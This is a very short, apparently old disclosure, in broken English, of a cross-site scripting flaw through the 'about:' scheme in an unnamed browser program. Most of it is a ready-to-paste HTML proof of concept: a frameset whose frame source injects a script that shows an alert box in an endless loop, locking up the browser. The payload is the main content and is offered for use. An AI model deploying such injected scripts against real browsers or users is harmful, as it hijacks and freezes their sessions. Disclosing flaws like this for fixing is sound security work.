The program is vulnerable to attacks of the kind xss the parameter "about:"
scripts without authorization in the example that I am presenting is a page
that runs a while with a msgbox infinity.
Create an html file and paste the following code
<html>
<frameset rows="100%">
<frame src="about:<script>while(1)alert("Juan Pablo Lopez
Yacubian")</script>">
</frameset>
</html>